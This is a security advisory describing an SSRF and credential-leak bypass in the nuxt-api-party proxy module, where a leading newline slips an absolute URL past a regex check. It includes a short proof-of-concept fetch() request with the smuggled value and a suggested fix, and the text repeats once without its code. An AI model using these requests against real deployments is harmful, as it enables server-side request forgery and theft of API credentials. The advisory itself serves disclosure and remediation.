Summary
nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. A previous vulnerability allowed an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF.
This vulnerability is similar, and was caused by a recent change to the detection of absolute URLs, which is no longer sufficient to prevent SSRF.
Details
nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use a regular expression ^https?://.
This regular expression can be bypassed by an absolute URL with leading whitespace. For example \nhttps://whatever.com has a leading newline.
According to the fetch specification, before a fetch is made the URL is normalized. "To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue." (source)
This means the final request will be normalized to https://whatever.com. We have bypassed the check and nuxt-api-party will send a request outside of the whitelist.
This could allow us to leak credentials or perform SSRF.
PoC
POC using Node.
await fetch("/api/__api_party/MyEndpoint", {
method: "POST",
body: JSON.stringify({ path: "\nhttps://google.com" }),
headers: { "Content-Type": "application/json" }
})We can use __proto__ as a substitute for the endpoint if it is not known. This will not leak any credentials as all attributes on endpoint will be undefined.
await fetch("/api/__api_party/__proto__", {
method: "POST",
body: JSON.stringify({ path: "\nhttps://google.com" }),
headers: { "Content-Type": "application/json" }
})Impact
Leak of sensitive API credentials. SSRF.
Fix
Revert to the previous method of detecting absolute URLs.
if (new URL(path, 'http://localhost').origin !== 'http://localhost') {
// ...
}References
OhB00 Reporter
Summary
nuxt-api-partyallows developers to proxy requests to an API without exposing credentials to the client. A previous vulnerability allowed an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF.This vulnerability is similar, and was caused by a recent change to the detection of absolute URLs, which is no longer sufficient to prevent SSRF.
Details
nuxt-api-partyattempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use a regular expression^https?://.This regular expression can be bypassed by an absolute URL with leading whitespace. For example
\nhttps://whatever.comhas a leading newline.According to the fetch specification, before a fetch is made the URL is normalized. "To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue." (source)
This means the final request will be normalized to
https://whatever.com. We have bypassed the check andnuxt-api-partywill send a request outside of the whitelist.This could allow us to leak credentials or perform SSRF.
PoC
POC using Node.
We can use
__proto__as a substitute for the endpoint if it is not known. This will not leak any credentials as all attributes onendpointwill be undefined.Impact
Leak of sensitive API credentials. SSRF.
Fix
Revert to the previous method of detecting absolute URLs.
References